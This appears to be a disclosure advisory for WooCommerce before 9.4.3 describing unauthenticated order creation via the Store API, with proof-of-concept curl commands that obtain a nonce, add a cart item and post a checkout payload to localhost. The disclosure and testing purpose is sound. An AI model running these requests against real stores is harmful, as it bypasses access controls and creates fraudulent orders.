WooCommerce < 9.4.3 – Unauthenticated Order Creation

Description

The plugin does not restrict orders creation when the guest checkout is disabled in the settings, allowing unauthenticated users to create arbitrary orders.

Proof of Concept

- Install a dummy payments gateway to ease testing, enable it.
- Make sure than you have guest checkout disabled: wp option set woocommerce_enable_guest_checkout no
- Take note of the id for an existing product from the shop.
- Run the following command, take note of the nonce:
curl -I http://localhost/wp-json/wc/store/cart | grep Nonce:

Run the following command, replacing the nonce and product id values as appropriate, you should get a “201 created” response:
curl -c cookies.txt -v -X POST "http://localhost/wp-json/wc/store/cart/add-item?id=&quantity=1" -H "Nonce: "

Run the following command, again replacing the nonce value (example addresses in Spain, if you want to craft a different JSON payload this online tool can help you to convert it to a CURL argument), you’ll get a “200 Ok” with information about the order that has been created:
curl -b cookies.txt -v -X POST "http://localhost/wp-json/wc/store/checkout" -H "Nonce: " -H "Content-Type: application/json" -d "{\"shipping_address\":{\"email\":\"foobar@example.com\",\"first_name\":\"foo\",\"last_name\":\"bar\",\"postcode\":\"07000\",\"city\":\"Fizzbuzz\",\"state\":\"CC\",\"country\":\"ES\",\"address_1\":\"FakeSt.123\"},\"billing_address\":{\"email\":\"foobar@example.com\",\"first_name\":\"foo\",\"last_name\":\"bar\",\"postcode\":\"07000\",\"city\":\"Fizzbuzz\",\"state\":\"CC\",\"country\":\"ES\",\"address_1\":\"FakeSt.123\"},\"payment_method\":\"dummy\"}"